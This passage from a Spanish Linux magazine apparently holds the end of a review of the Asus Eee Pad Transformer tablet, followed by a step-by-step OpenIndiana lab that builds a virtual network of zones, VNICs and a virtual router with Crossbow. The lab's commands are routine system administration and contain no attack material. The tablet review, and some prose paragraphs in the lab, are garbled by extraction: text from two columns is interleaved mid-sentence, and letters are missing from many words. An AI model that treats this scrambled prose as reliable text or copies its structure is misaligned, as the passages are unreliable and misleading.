interactivo que, no sólo responde a depágina.
24.4 W/h.
nuestros movimientos gracias al
acelerómetro, sino que es capaz de
mostrar la batería restante del
El software
dispositivo en función de lo alto o lo
bajo que se encuentre el nivel del
Por supuesto en este equipo agua y sus cubitos de hielo.
podemos disfrutar de todas las
aplicaciones incluidas en Android
Honeycomb, las remodeladas
versiones de Gmail, Cor eo
Electrónico, Gtalk con soporte para
la videocámara frontal para hacer
videoconferencias y la bien lograda
versión de Youtube para tabletas
junto a los modernos widgets
redimensionables e interactivos de También el fabricante ha añadido
la versión para tabletas del sistema. una aplicación lamada MyCloud,
que funciona como puerta de Para el apartado profesional o
enlace al sistema WebStorage, que estudiantil se ha incluido el Polaris
nos permite almacenar nuestros Of ice, con él podemos crear o
datos en la nube para acceder a editar documentos de texto, hojas
elos, tanto desde el propio de cálculo y presentaciones,
dispositivo como desde nuestro insertar imágenes o fotografías,
ordenador (siempre y cuando tomadas por la propia cámara de la
instalemos el software necesario, tableta por ejemplo, todo elo desde
claro).
el propio equipo y a ser posible con
tuxmóvil
tuxmovil




la inestimable ayuda de su dock
teclado y un mouse para trabajar,
con teclado. Esto da un gran
en el Eee Pad Transformer
aumento de la productividad, algo
podemos usar un mouse
que se critica en las tabletas a
convencional USB con sólo
veces y podría servir por ejemplo
conectarlo a unos de los dos
para trabajos de estudiantes,
conectores del docking, entonces
escritores, periodistas u otros
aparecerá en pantala un puntero y
profesionales.
tendremos una experiencia similar
También podríamos utilzar alguna a un pequeño portátil y hasta con la
aplicación que no tenga una versión rueda del mouse cambiar entre los
adaptada a tabletas como podría escritorios.
ser el cliente oficial de Twit er o el
programa para escuchar Podcasts
Listen y hacer uso de la función de En
la
comunidad
de
estirar el mismo para que se adapte desar oladores
de
XDA
a una pantala grande.
Developers ya se han aficionado
por esta tableta y varios de sus
integrantes ya han empezado a
Fuera de las aplicaciones, widgets, Lo bueno y lo malo
hacerle cosas, han conseguido
fondos que trae Honeycomb y las
encontrar una solución para buscar
comentadas queAsus colocó a este A favor muchas cosas, su pantala, un cargador externo suplementario
equipo, quizás aún no hay tantas su gran autonomía, sus y colocarle Ubuntu, y hasta poder
aplicaciones
específicamente actualizaciones, su versatildad colocar ambos sistemas, Android y
diseñadas para tabletas, aunque junto a su dock, poder contar con Ubuntu con doble boot.
eso seguro mejorará y bastante con un teclado al 92 %, lo positivo de su
el tiempo, de hecho podemos fila superior dedicada a los Lo no tan bueno, su cargador y el
encontrar varias aplicaciones ya números y funciones como teclas cable propietario de Asus como
adaptadas, algunas de Google, para manejar el brilo, Bluetooth, tienen otras marcas como
como Reader o Docs, algunas de funciones multimedia o activar y/o Samsung.
terceros como el excelente cliente desactivar el Wi­Fi entre otras.
de Twit er Plume o el lector gráfico
de RSS Pulse entre otros.
El cable de sincronización tiene
Poder usar el trackpad como en sólo 90 cm. de longitud y no se
una netbook. Personalmente puede alargar con un extensor
prefiero contar con un cómodo USB, podría estar bien para
conectarlo a una PC pero se queda
corto conectado a su cargador.
Tampoco se puede sustituir por
otro, ya que como en el cable, su
conector USB está modificado y al
conectarle otro no recibe la
información de carga, aunque
como comentamos, ya hay
soluciones para esto, como
también para que la reconozca
Ubuntu o Linux Mint y pueda
montarla en el sistema para hacer
transferencia de archivos sin tener
que recur ir a hacerlo por wi­fi,
bluetooth, SSH u otros métodos
tuxmóvil
tuxmovil




firma taiwanesa, hace poco ha
aparecido su hermano el Asus Eee
Pad Slider, una tableta Android con
teclado deslizante, y también se
presentó en el Computex de Taipei
el Asus Pad Phone, una tableta
que seguramente dará mucho de
qué hablar. Y es que no se trata
sólo de una tableta sino de un
híbrido entre tableta y Smartphone.
Que haya versiones sólo Wifi y que
no sea el más delgado ni ligero
pueden jugar en su contra, pero no
mucho más que otros.
A favor tiene todo lo demás:
mas engor osos.
para abastecer con suficientes pantala IPS de gran calidad,
unidades a los países donde ya rendimiento y un accesorio que
También
han
conseguido estaba presentada, eso fue casi nos da dos gadgets en uno.
Rootearla, para así poder utilzar subsanado posteriormente y no Sin lugar a dudas la Asus Eee Pad
aplicaciones que requieran de este tardó mucho en legar a mi país, la Transformer es una excelente
privilegio, como el caso de poderle RepúblicaArgentina.
tableta para poder disfrutar de
hacer Overclock, con el que han
Android 3.2 Honeycomb.
Casi todas las tabletas con
Honeycomb del mercado cumplen
las mismas especificaciones
técnicas, pero es en los accesorios
y conectores en lo que más se
diferencian entre elas.
El ASUS Eee Pad Transformer que
hemos analizado en Tuxinfo con
muy buenos resultados es un
Rodolfo Mena
ht p:/ ar­gadget.com
legado hasta los 1.6 Ghz, o bien modelo diferente y con un precio
rodolfomena2006@gmail.com
instalar aplicaciones o acceder a más ajustado que otros que ni
twit er: @rodolfitom
funciones que requieran de esta siquiera tienen la posibildad de
posibildad.
colocarle un docking con las
ventajas del mismo.
Conclusiones
No es la única propuesta diferente
en cuanto a tabletas que tiene la
La Eee Pad Transformer es una de
las tablet con Honeycomb de
mayor éxito que más ventas ha
tenido a nivel mundial gracias a la
buena combinación de materiales,
especificaciones y acabado, hasta
en un momento hubo problemas
tuxmóvil
tuxmovil



Crossbow (I )
La práctica
POR HERNÁN “HeCSa” SALTIEL
Gráficamente, el esquema es el
siguiente. Como vemos en el
diagrama anterior, las direcciones IP
La problemática
a asignar serán las siguientes:
­ Cliente: 20.0.0.2/24, puerta de
La semana pasada tuvimos nuestro Lo primero que veremos, es la enlace predeterminada: 20.0.0.1.
primer baño de inmersión en los problemática que tendremos que
conceptos de Crossbow. Vimos resolver a través de Crossbow. Nos ­ Virtual Router, pata externa:
cómo funciona este proyecto, qué pondremos delante de un esquema 20.0.0.1/24
bondades provee, y cómo nos de red que desearemos reproducir
puede simplificar la vida a la hora de lógicamente en nuestra máquina ­ Virtual Router, pata interna:
virtualizar redes en nuestros utilzando sólo las her amientas que 10.0.0.1/24
sistemas.
el mismo sistema operativo entrega.
­ Servidor web: 10.0.0.2/24, puerta
Esta vez haremos una práctica que El esquema de red está constituido de enlace predeterminada: 10.0.0.1.
nos permitirá recrear un pequeño por un cliente, conectado a un router
centro de cómputos en la privacidad que dirigirá conexiones hacia dos
de nuestra máquina, o la exposición servidores posibles: uno de páginas ­ Servidor de bases de datos:
de un servidor publicado en Internet. web y otro de bases de datos 10.0.0.3/24, puerta de enlace
PostgreSQL. Estos dos últimos predeterminada: 10.0.0.1.
servidores deberán estar en una red
diferente de la del cliente.
Manos a la obra
Lo primero que haremos será
desactivar la funcionalidad “Network
Magic”, ya que no lo podremos
utilzar para asignar configuraciones
automáticas en nuestra nueva
infraestructura de red. Todas las
tareas siguientes las ejecutaremos
como el usuario “root” en una
terminal.
Primero verificamos la forma en que
la red se está configurando:
57 www.tuxinfo.com.ar

hecsa@battlelloyd-o:~$ su -
Password:
OpenIndiana (powered by illumos)

SunOS 5.11
oi_151a
September 2011
root@battlelloyd-o:~# svcs physical:nwam
STATE

STIME
FMRI
online
16:52:53 svc:/network/physical:nwam
Entonces deshabiltaremos “nwam”, y habiltaremos “default”:
root@battlelloyd-o:~# svcadm disable physical:nwam
root@battlelloyd-o:~# svcadm enable physical:default

IMPORTANTE: Si estamos conectados en forma remota a un servidor, no lo hagamos, y acerquémonos a la consola
del sistema, ya que al deshabiltar “nwam”, también perderemos conexión con él.
Verificamos que todo quedó bien:
root@battlelloyd-o:~# svcs physical:nwam
STATE

STIME
FMRI
disabled
16:57:32 svc:/network/physical:nwam
root@battlelloyd-o:~# svcs physical:default
STATE

STIME
FMRI
online
16:59:10 svc:/network/physical:default
Ya con el esquema de configuración de red modificado, crearemos 2 etherstubs. Un etherstub se podría comparar con
un switch al que nadie le ha colocado (aún) una boca de red. Entonces, le implantaremos a martilazos bocas a medida
que las necesitemos:
root@battlelloyd-o:~# dladm show-etherstub
root@battlelloyd-o:~# dladm create-etherstub Etherstub1
root@battlelloyd-o:~# dladm create-etherstub Etherstub2
root@battlelloyd-o:~# dladm show-etherstub
LINK
Etherstub1
Etherstub2

Etherstub1 tendrá las conexiones de la red 10.0.0.0/24 (vnic1, vnic2 y vnic3) , y Etherstub2 las de la 20.0.0.0/24 (vnic4
y vnic5).
Ya tenemos los etherstubs. Ahora crearemos las Virtual NICs necesarias para todo nuestro proyecto, es decir, las que
interconectarán los etherstubs con las máquinas y el switch virtuales:
root@battlelloyd-o:~# dladm create-vnic -l Etherstub1 vnic1
root@battlelloyd-o:~# dladm create-vnic -l Etherstub1 vnic2
root@battlelloyd-o:~# dladm create-vnic -l Etherstub1 vnic3
root@battlelloyd-o:~# dladm create-vnic -l Etherstub2 vnic4
root@battlelloyd-o:~# dladm create-vnic -l Etherstub2 vnic5
root@battlelloyd-o:~# dladm show-vnic
LINK

OVER
SPEED
MACADDRESS
MACADDRTYPE
VID
vnic1
Etherstub1
0
2:8:20:51:4a:a0
random
0
vnic2
Etherstub1
0
2:8:20:a:bc:dc
random
0
vnic3
Etherstub1
0
2:8:20:fd:b4:1f
random
0
vnic4
Etherstub2
0
2:8:20:35:45:ef
random
0
vnic5
Etherstub2
0
2:8:20:e6:5d:cc
random
0
Nótese que a cada vnic se le ha asignado una dirección MAC virtual. Estas direcciones se generan en forma aleatoria,
como lo podemos ver en la columna “MACADDRTYPE”, con el valor “random”. Y nótese también que en la columna
“OVER” se especifica en qué Etherstub está montada cada vNIC.
58 www.tuxinfo.com.ar

Ahora, para poder hacer nuestra práctica bien realista, crearemos las máquinas virtuales, pero con la variante de la
creación de una plantila. Desde la misma se construirán, a su imagen y semejanza (¿me estoy poniendo religioso?),
las demás máquinas.
Crearemos un nuevo sistema de archivos ZFS y lo montaremos en un determinado subdirectorio:
root@battlelloyd-o:~# zfs create rpool/zones
root@battlelloyd-o:~# zfs set mountpoint=/zones rpool/zones
root@battlelloyd-o:~# zfs list
NAME

USED
AVAIL
REFER
MOUNTPOINT
rpool
12.9G
88.5G
48K
/rpool
rpool/ROOT
9.69G
88.5G
31K
legacy
...
rpool/zones

31K
88.5G
31K
/zones
Recordemos que si no hemos reconfigurado la red luego de cambiar de “nwam” a “default”, debemos tocar el archivo
“/etc/nsswitch.conf” para agregar, en la entrada de “hosts”, el protocolo “dns”. También debemos agregar la puerta de
enlace predeterminada con el comando:
root@battlelloyd-o:~# route add default <puerta de enlace>
Sin estos pasos, la zona “vmtipo” no se podrá instalar, ya que no tendrá forma de legar a Internet.
Si todo está configurado, crearemos la zona “vmtipo”:
root@battlelloyd-o:~# zonecfg -z vmtipo
vmtipo: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:vmtipo> create
zonecfg:vmtipo> set zonepath=/zones/vmtipo
zonecfg:vmtipo> set ip-type=exclusive
zonecfg:vmtipo> verify
zonecfg:vmtipo> commit
zonecfg:vmtipo> exit
root@battlelloyd-o:~# zoneadm -z vmtipo install
A ZFS file system has been created for this zone.

Publisher: Using openindiana.org (http://pkg.openindiana.org/dev/ ).
Publisher: Using sfe-encumbered (http://pkg.openindiana.org/sfe-encumbered/).
Publisher: Using sfe (http://pkg.openindiana.org/sfe/).

Image: Preparing at /zones/vmtipo/root.
Cache: Using /var/pkg/download.

Sanity Check: Looking for 'entire' incorporation.
Installing: Core System (output follows)
Packages to install:
1
Create boot environment:
No
DOWNLOAD
PKGS
FILES
XFER (MB)
Completed
1/1
3/3
0.0/0.0
PHASE
ACTIONS
Install Phase
15/15
PHASE
ITEMS
Package State Update Phase
1/1
Image State Update Phase
2/2
Packages to install:
50
Create boot environment:
No
Services to restart:
3
DOWNLOAD
PKGS
FILES
XFER (MB)
Completed
50/50 22960/22960
117.8/117.8
PHASE
ACTIONS
Install Phase
29696/29696
59 www.tuxinfo.com.ar

PHASE
ITEMS
Package State Update Phase
50/50
Image State Update Phase
2/2
Installing: Additional Packages (output follows)
Packages to install:
48
Create boot environment:
No
Services to restart:
2
DOWNLOAD
PKGS
FILES
XFER (MB)
Completed
48/48
4883/4883
28.3/28.3
PHASE
ACTIONS
Install Phase
6661/6661
PHASE
ITEMS
Package State Update Phase
48/48
Image State Update Phase
2/2
Note: Man pages can be obtained by installing SUNWman
Postinstall: Copying SMF seed repository ... done.
Postinstall: Applying workarounds.

Done: Installation completed in 1508.153 seconds.
Next Steps: Boot the zone, then log into the zone console (zlogin -C)
to complete the configuration process.
Si bien el sistema nos indica que las futuras máquinas virtuales. Sólo serán los servidores web y de bases
debemos bootear la zona y dejémosla como está, y usémosla de datos. Notemos que en lugar de
conectarnos a ela para configurarla, en el futuro.Ahora.
asignarles interfaces de red físicas,
no lo haremos. Esta es una plantila,
les asignaremos vNICs:
y si la booteáramos y Construiremos las máquinas
configuráramos,
estaríamos virtuales necesarias para crear un Creamos la configuración de la
otorgándole propiedades que luego Virtual Router y tres hosts; uno que primer máquina virtual, “Host1”:
habría que modificar en cada una de hará las veces de cliente, y dos que
root@battlelloyd-o:~# zonecfg -z host1
host1: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:host1> create
zonecfg:host1> set zonepath=/zones/host1
zonecfg:host1> set ip-type=exclusive
zonecfg:host1> add net
zonecfg:host1:net> set physical=vnic1
zonecfg:host1:net> end
zonecfg:host1> verify
zonecfg:host1> commit
zonecfg:host1> exit

Ahora clonamos la máquina virtual “vmtipo” para crear la nueva:
root@battlelloyd-o:~# zoneadm -z host1 clone vmtipo
En este caso, sí la booteamos, y nos conectamos a su consola mediante “zlogin ­C host1”, para configurarla:
root@battlelloyd-o:~# zoneadm -z host1 boot
root@battlelloyd-o:~# zlogin -C host1

What type of terminal are you using?
1) ANSI Standard CRT
2) DEC VT52
3) DEC VT100
4) Heathkit 19

60 www.tuxinfo.com.ar

5) Lear Siegler ADM31
6) Sun Command Tool
7) Sun Workstation
8) Televideo 910
9) Wyse Model 50
10) X Terminal Emulator (xterms)
11) CDE Terminal Emulator (dtterm)
12) Other

Type the number of your choice and press Return: 10
─ Host Name for vnic1 ──────────────────────────────────────────────────────────
Enter the host name which identifies this system on the network.
The name
must be unique within your domain; creating a duplicate host name will cause
problems on the network after you install Solaris.

A host name must have at least one character; it can contain letters,
digits, and minus signs (-).

Host name for vnic1 host1
(presionar F2 ó Esc-2)
─ IP Address for vnic1 ─────────────────────────────────────────────────────────
Enter the Internet Protocol (IP) address for this network interface.
It
must be unique and follow your site's address conventions, or a
system/network failure could result.

IP addresses contain four sets of numbers separated by periods (for example
129.200.9.1).

IP address for vnic1 10.0.0.2
(presionar F2 ó Esc-2)
─ Subnet for vnic1 ─────────────────────────────────────────────────────────────
On this screen you must specify whether this system is part of a subnet.
If
you specify incorrectly, the system will have problems communicating on the
network after you reboot.

> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
System part of a subnet
───────────────────────
[X] Yes
[ ] No

(presionar F2 ó Esc-2)
─ Netmask for vnic1 ────────────────────────────────────────────────────────────
On this screen you must specify the netmask of your subnet.
A default
netmask is shown; do not accept the default unless you are sure it is
correct for your subnet.

A netmask must contain four sets of numbers
separated by periods (for example 255.255.255.0).
Netmask for vnic1 255.255.255.0
(presionar F2 ó Esc-2)
─ IPv6 for vnic1 ───────────────────────────────────────────────────────────────
61 www.tuxinfo.com.ar

Specify whether or not you want to enable IPv6, the next generation Internet
Protocol, on this network interface.

Enabling IPv6 will have no effect if
this machine is not on a network that provides IPv6 service.
IPv4 service
will not be affected if IPv6 is enabled.
> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
Enable IPv6 for vnic1
─────────────────────
[ ] Yes
[X] No

(presionar F2 ó Esc-2)
─ Set the Default Route for vnic1 ──────────────────────────────────────────────
To specify the default route, you can let the software try to detect one
upon reboot, you can specify the IP address of the router, or you can choose
None.

Choose None if you do not have a router on your subnet.
> To make a selection, use the arrow keys to select your choice and press
Return to mark it [X].

Default Route for vnic1
──────────────────────────
[ ] Detect one upon reboot
[X] Specify one
[ ] None

(presionar F2 ó Esc-2)
─ Default Route IP Address for vnic1 ───────────────────────────────────────────
Enter the IP address of the default route. This entry will be placed in the
/etc/defaultrouter file and will be the default route after you reboot
(example 129.146.89.225).

Router IP Address for vnic1 10.0.0.1
(presionar F2 ó Esc-2)
─ Confirm Information for vnic1 ────────────────────────────────────────────────
> Confirm the following information.
If it is correct, press F2;
to change any information, press F4.
Host name: host1
IP address: 10.0.0.2
System part of a subnet: Yes
Netmask: 255.255.255.0
Enable IPv6: No
Default Route: Specify one
Router IP Address: 10.0.0.1
(presionar F2 ó Esc-2)
─ Configure Security Policy: ───────────────────────────────────────────────────
Specify Yes if the system will use the Kerberos security mechanism.
Specify No if this system will use standard UNIX security.
62 www.tuxinfo.com.ar

Configure Kerberos Security
───────────────────────────
[ ] Yes
[X] No

(presionar F2 ó Esc-2)
─ Confirm Information ──────────────────────────────────────────────────────────
> Confirm the following information.
If it is correct, press F2;
to change any information, press F4.
Configure Kerberos Security: No
(presionar F2 ó Esc-2)
─ Name Service ─────────────────────────────────────────────────────────────────
On this screen you must provide name service information.
Select the name
service that will be used by this system, or None if your system will either
not use a name service at all, or if it will use a name service not listed
here.

> To make a selection, use the arrow keys to highlight the option
and press Return to mark it [X].
Name service
────────────
[ ] NIS
[ ] DNS
[ ] LDAP
[X] None

(presionar F2 ó Esc-2)
─ Confirm Information ──────────────────────────────────────────────────────────
> Confirm the following information.
If it is correct, press F2;
to change any information, press F4.
Name service: None
(presionar F2 ó Esc-2)
─ NFSv4 Domain Name ────────────────────────────────────────────────────────────
NFS version 4 uses a domain name that is automatically derived from the
system's naming services. The derived domain name is sufficient for most
configurations. In a few cases, mounts that cross domain boundaries might
cause files to appear to be owned by "nobody" due to the lack of a common
domain name.

The current NFSv4 default domain is: ""
NFSv4 Domain Configuration
──────────────────────────────────────────────
[X] Use the NFSv4 domain derived by the system
[ ] Specify a different NFSv4 domain

(presionar F2 ó Esc-2)
─ Confirm Information for NFSv4 Domain ─────────────────────────────────────────
63 www.tuxinfo.com.ar

> Confirm the following information.
If it is correct, press F2;
to change any information, press F4.
NFSv4 Domain Name:
<< Value to be derived dynamically >>
(presionar F2 ó Esc-2)
─ Time Zone ────────────────────────────────────────────────────────────────────
On this screen you must specify your default time zone.
You can specify a
time zone in three ways:
select one of the continents or oceans from the
list, select other - offset from GMT, or other - specify time zone file.
> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
Continents and Oceans
──────────────────────────────────

-
[ ] Africa

[X] Americas

[ ] Antarctica

[ ] Arctic Ocean

[ ] Asia

[ ] Atlantic Ocean

[ ] Australia

[ ] Europe
v
[ ] Indian Ocean
(presionar F2 ó Esc-2)
─ Country or Region ────────────────────────────────────────────────────────────
> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
Countries and Regions
───────────────────────────

-
[ ] United States

[ ] Anguilla

[ ] Antigua & Barbuda

[X] Argentina

[ ] Aruba

[ ] Bahamas

[ ] Barbados

[ ] Belize

[ ] Bolivia

[ ] Brazil

[ ] Canada

[ ] Cayman Islands
v
[ ] Chile
(presionar F2 ó Esc-2)
─ Time Zone ────────────────────────────────────────────────────────────────────
> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
Time zones
───────────────────────────────────────────────────
[X] Buenos Aires (BA, CF)
[ ] most locations (CB, CC, CN, ER, FM, MN, SE, SF)
[ ] (SA, LP, NQ, RN)
[ ] Jujuy (JY)

64 www.tuxinfo.com.ar

[ ] Tucuman (TM)
[ ] Catamarca (CT), Chubut (CH)
[ ] La Rioja (LR)
[ ] San Juan (SJ)
[ ] Mendoza (MZ)
[ ] San Luis (SL)
[ ] Santa Cruz (SC)
[ ] Tierra del Fuego (TF)

(presionar F2 ó Esc-2)
─ Confirm Information ──────────────────────────────────────────────────────────
> Confirm the following information.
If it is correct, press F2;
to change any information, press F4.
Time zone: Buenos Aires (BA, CF)
(America/Buenos_Aires)
(presionar F2 ó Esc-2)
─ Root Password ────────────────────────────────────────────────────────────────
Please enter the root password for this system.
The root password may contain alphanumeric and special characters.
For
security, the password will not be displayed on the screen as you type it.
> By default, a root password is REQUIRED.
> If you do not want a root password, leave both entries blank
> and edit /etc/default/login to include PASSREQ=NO before
> rebooting.

Root password:
*********
Root password:
*********
(presionar F2 ó Esc-2)
System identification is completed.
rebooting system due to change(s) in /etc/default/init
[NOTICE: Zone rebooting]
SunOS Release 5.11 Version oi_151a 32-bit
Copyright (c) 1983, 2010, Oracle and/or its affiliates. All rights reserved.
Hostname: host1

host1 console login: root
Password:
Oct 31 01:37:41 host1 login: ROOT LOGIN /dev/console
OpenIndiana (powered by illumos)

SunOS 5.11
oi_151a
September 2011
root@host1:~# ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1

inet 127.0.0.1 netmask ff000000
vnic1: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 9000 index 2
inet 10.0.0.2 netmask ffffff00 broadcast 10.0.0.255
ether 2:8:20:51:4a:a0

lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
Bien, ya teniendo la primer máquina virtual creada y configurada, podremos hacer lo mismo con la segunda, “host2”.
Primero tendremos que salir de una emulación de consola serial que tenemos conectada a “host1”, y para elo
presionamos “~.”.
65 www.tuxinfo.com.ar

Los pasos para “host2” son los mismos que para “host1”, con los siguientes como únicos cambios. En la creación de la
máquina virtual:
root@battlelloyd-o:~# zonecfg -z host2
host2: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:host2> create
zonecfg:host2> set zonepath=/zones/host2
zonecfg:host2> set ip-type=exclusive
zonecfg:host2> add net
zonecfg:host2:net> set physical=vnic2
zonecfg:host2:net> end
zonecfg:host2> verify
zonecfg:host2> commit
zonecfg:host2> exit

En la instalación de la máquina virtual:
root@battlelloyd-o:~# zoneadm -z host2 clone vmtipo
La booteamos, nos conectamos a ela, y en la configuración, todo es igual a “host1”, a excepción de:

─ Host Name for vnic2 ──────────────────────────────────────────────────────────

Enter the host name which identifies this system on the network.
The name
must be unique within your domain; creating a duplicate host name will cause
problems on the network after you install Solaris.

A host name must have at least one character; it can contain letters,
digits, and minus signs (-).

Host name for vnic2 host2

─ IP Address for vnic2 ─────────────────────────────────────────────────────────

Enter the Internet Protocol (IP) address for this network interface.
It
must be unique and follow your site's address conventions, or a
system/network failure could result.

IP addresses contain four sets of numbers separated by periods (for example
129.200.9.1).

IP address for vnic2 10.0.0.3

Lo mismo haremos para “cliente”, donde las únicas diferencias serán, para el caso de la configuración:
root@battlelloyd-o:~# zonecfg -z cliente
cliente: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:cliente> create
zonecfg:cliente> set zonepath=/zones/cliente
zonecfg:cliente> set ip-type=exclusive
zonecfg:cliente> add net
zonecfg:cliente:net> set physical=vnic5
zonecfg:cliente:net> end
zonecfg:cliente> verify
zonecfg:cliente> commit
zonecfg:cliente> exit

66 www.tuxinfo.com.ar

La instalamos:
root@battlelloyd-o:~# zoneadm -z cliente clone vmtipo
La booteamos, nos conectamos a ela, y en la configuración, todo es igual a “host1”, a excepción de:
...
Host Name for vnic5 ──────────────────────────────────────────────────────────
Enter the host name which identifies this system on the network.
The name
must be unique within your domain; creating a duplicate host name will cause
problems on the network after you install Solaris.

A host name must have at least one character; it can contain letters,
digits, and minus signs (-).

Host name for vnic5 cliente

─ IP Address for vnic5 ─────────────────────────────────────────────────────────

Enter the Internet Protocol (IP) address for this network interface.
It
must be unique and follow your site's address conventions, or a
system/network failure could result.

IP addresses contain four sets of numbers separated by periods (for example
129.200.9.1).

IP address for vnic5 20.0.0.2

─ Default Route IP Address for vnic5 ───────────────────────────────────────────

Enter the IP address of the default route. This entry will be placed in the
/etc/defaultrouter file and will be the default route after you reboot
(example 129.146.89.225).

Router IP Address for vnic5 20.0.0.1

Notemos que en este caso, la dirección IP de la puerta de enlace predeterminada es 20.0.0.1, y no 10.0.0.1, como en el
caso de “host1” y “host2”.
Ahora lega la hora de configurar un sistema que puede tener algo más de complejidad, pero no mucha. Es el Virtual
Router. La lista de comandos es la siguiente, y notemos que le configuramos dos interfaces de red, no una como en los
casos anteriores:
root@battlelloyd-o:~# zonecfg -z vrouter
vrouter: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:vrouter> create
zonecfg:vrouter> set zonepath=/zones/vrouter
zonecfg:vrouter> set ip-type=exclusive
zonecfg:vrouter> add net
zonecfg:vrouter:net> set physical=vnic3
zonecfg:vrouter:net> end
zonecfg:vrouter> add net
zonecfg:vrouter:net> set physical=vnic4
zonecfg:vrouter:net> end
zonecfg:vrouter> verify
zonecfg:vrouter> commit
zonecfg:vrouter> exit

67 www.tuxinfo.com.ar

Procederemos a instalarlo:
root@battlelloyd-o:~# zoneadm -z vrouter clone vmtipo
Lo booteamos, y nos conectamos a su consola como en los casos anteriores. Los puntos en los que la configuración
inicial diferirá son los siguientes:
...
─ Configure Multiple Network Interfaces ────────────────────────────────────────

Multiple network interfaces have been detected on this system.
Specify all
of the network interfaces you want to configure.
Note: You must choose at least one interface to configure.
Network interfaces
──────────────────
[X] vnic3
[X] vnic4


─ Primary Network Interface ────────────────────────────────────────────────────

On this screen you must specify which of the following network adapters is
the system's primary network interface.

Usually the correct choice is the
lowest number.
However, do not guess; ask your system administrator if
you're not sure.
> To make a selection, use the arrow keys to highlight the option and
press Return to mark it [X].
Primary network interface
─────────────────────────
[X] vnic3
[ ] vnic4


─ Host Name for vnic3 ──────────────────────────────────────────────────────────

Enter the host name which identifies this system on the network.
The name
must be unique within your domain; creating a duplicate host name will cause
problems on the network after you install Solaris.

A host name must have at least one character; it can contain letters,
digits, and minus signs (-).

Host name for vnic3 vrouter

─ IP Address for vnic3 ─────────────────────────────────────────────────────────

Enter the Internet Protocol (IP) address for this network interface.
It
must be unique and follow your site's address conventions, or a
system/network failure could result.

IP addresses contain four sets of numbers separated by periods (for example
129.200.9.1).

IP address for vnic3 10.0.0.1

─ Set the Default Route for vnic3 ──────────────────────────────────────────────

To specify the default route, you can let the software try to detect one
upon reboot, you can specify the IP address of the router, or you can choose
None.

Choose None if you do not have a router on your subnet.
> To make a selection, use the arrow keys to select your choice and press
Return to mark it [X].

68 www.tuxinfo.com.ar

Default Route for vnic3
──────────────────────────
[ ] Detect one upon reboot
[ ] Specify one
[X] None


─ Host Name for vnic4 ──────────────────────────────────────────────────────────

Enter the host name which identifies this system on the network.
The name
must be unique within your domain; creating a duplicate host name will cause
problems on the network after you install Solaris.

A host name must have at least one character; it can contain letters,
digits, and minus signs (-).

Host name for vnic4 vrouter20

─ IP Address for vnic4 ─────────────────────────────────────────────────────────

Enter the Internet Protocol (IP) address for this network interface.
It
must be unique and follow your site's address conventions, or a
system/network failure could result.

IP addresses contain four sets of numbers separated by periods (for example
129.200.9.1).

IP address for vnic4 20.0.0.1

─ Set the Default Route for vnic4 ──────────────────────────────────────────────

To specify the default route, you can let the software try to detect one
upon reboot, you can specify the IP address of the router, or you can choose
None.

Choose None if you do not have a router on your subnet.
> To make a selection, use the arrow keys to select your choice and press
Return to mark it [X].

Default Route for vnic4
──────────────────────────
[ ] Detect one upon reboot
[ ] Specify one
[X] None


Luego de tener todos los sistemas ­ Desde “host1” y “host2” hacia la Configuraremos la capacidad de
virtuales levantados, notaremos que dirección IP 10.0.0.1.
redirigir trafico IP en el Virtual
podemos ejecutar ping:
Router (IP forwarding):
­ Desde “vrouter” hacia “host1”,
­ Desde “cliente” hacia la dirección “host2” y “cliente”.
IP 20.0.0.1.
­ No hay ping entre las dos subredes
­ Desde “host1” hacia “host2” y (20.0.0.0/24 y 10.0.0.0/24). Claro
viceversa.
está, falta configurar el paso de
paquetes de red entre una y otra
red.
69 www.tuxinfo.com.ar


root@vrouter:~# svcs network/ipv4-forwarding
STATE

STIME
FMRI
disabled
2:16:22 svc:/network/ipv4-forwarding:default
root@vrouter:~# svcadm enable network/ipv4-forwarding
root@vrouter:~# svcs network/ipv4-forwarding
STATE

STIME
FMRI
online
2:20:23 svc:/network/ipv4-forwarding:default
Y ahora ya estamos listos para probar conectividad entre las diferentes máquinas virtuales:
root@clienteOQ:~# ping 10.0.0.1
10.0.0.1 is alive
root@clienteOQ:~# ping 10.0.0.2
10.0.0.2 is alive
root@clienteOQ:~# ping 10.0.0.3
10.0.0.3 is alive
root@clienteOQ:~# ping 20.0.0.1
20.0.0.1 is alive
root@clienteOQ:~# ping 20.0.0.2
20.0.0.2 is alive

Como vemos, es posible el tráfico de red
desde y hacia todas las máquinas
virtuales. Ya tenemos un esquema de
red como el que en un principio
diseñamos, pero desplegado en una
única máquina física.
Llegó la hora de deshacer
Como siempre hacemos, luego de un
laboratorio que ha resultado exitoso,
procederemos a deshacer todo lo que
hicimos en los puntos anteriores, para
dejar nuestra máquina tal y como la
teníamos en un principio.
Primero, bajaremos todas las máquinas
virtuales. Si queremos conservar
“vmtipo” para usarla en un futuro, no es
mala opción:
70 www.tuxinfo.com.ar

root@battlelloyd-o:~# zoneadm list -icv
ID NAME
STATUS
PATH
BRAND
IP
0 global
running
/
ipkg
shared
9 cliente
running
/zones/cliente
ipkg
excl
12 vrouter
running
/zones/vrouter
ipkg
excl
13 host1
running
/zones/host1
ipkg
excl
14 host2
running
/zones/host2
ipkg
excl
- vmtipo
installed
/zones/vmtipo
ipkg
excl
root@battlelloyd-o:~# zoneadm -z cliente halt
root@battlelloyd-o:~# zoneadm -z vrouter halt
root@battlelloyd-o:~# zoneadm -z host1 halt
root@battlelloyd-o:~# zoneadm -z host2 halt

Ahora, desinstalaremos todas las máquinas virtuales:
root@battlelloyd-o:~# zoneadm list -icv
ID NAME
STATUS
PATH
BRAND
IP
0 global
running
/
ipkg
shared
- vmtipo
installed
/zones/vmtipo
ipkg
excl
- host1
installed
/zones/host1
ipkg
excl
- host2
installed
